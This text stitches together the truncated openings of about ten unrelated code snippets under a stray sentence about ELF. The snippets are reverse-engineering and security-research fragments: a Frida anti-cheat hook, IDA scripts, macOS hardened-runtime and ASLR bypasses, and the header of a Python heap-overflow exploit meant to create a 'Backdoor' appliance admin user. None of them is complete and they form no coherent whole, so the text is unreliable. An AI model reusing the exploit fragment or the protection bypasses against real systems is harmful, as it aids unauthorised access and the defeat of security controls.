Executable and Linkable Format (ELF) is the default binary format on Linux-based systems.
```typescript
import "frida-il2cpp-bridge";

function main() {
    const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image;
    // Note that on versions older than 2.x.y this isn't needed
    // since ACTk is bundled directly into Assembly-CSharp
    const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image;
    // Target class
    const PlayerData = AssemblyCSharp.class("PlayerData");
```
```python
import socket, struct, sys

p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks  # python closes out of scope sockets
    port = 3211  # this is hardcoded in the binary
    print(f"[*] Exploiting ASMP on {hostname} port {port}")
```
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <string.h>

/* ASLR disabling magic constant from Apple LLDB source code
   https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp
*/
```
```python
"""
summary: drawing custom graphs

description:
  Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
  show how to write actions that can be performed on those.

keywords: graph, actions
"""

from __future__ import print_function

# -----------------------------------------------------------------------
```
```python
from idautils import Segments, Functions, XrefsTo, XrefTypeName
from idc import get_segm_name, get_segm_end

class Dictionary(dict):
    def add(self, key, value):
        self[key] = value

xref_dict = Dictionary()

for segea in Segments():
```
```kotlin
package io.github.a13e300.demo.maho

import android.app.PendingIntent
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.content.pm.PackageInstaller
import android.content.pm.PackageInstaller.EXTRA_STATUS
import android.content.pm.PackageInstaller.STATUS_PENDING_USER_ACTION
```
```text
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
```
```bash
#! /bin/bash
# Simple utility script for allowing debug of hardened macOS apps.
# This is useful mostly for plug-in developers who would like to keep developing without turning SIP off.
# Credit for the idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg
# Update 2022-03-10: Based on Fabian's feedback, add capability to inject DYLD for sanitizers.
#
# Please note:
# - Modern Logic (on M1s) uses `AUHostingService`, which resides within the system and is thus not patchable; it REQUIRES turning off SIP.
# - Some hosts use separate plug-in scanning or sandboxing processes.
#   If that's the case, it's required to patch those (if needed) and attach the debugger to them instead.
```
```objective-c
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>

int main() {
    void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
    NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
    NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
    NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
```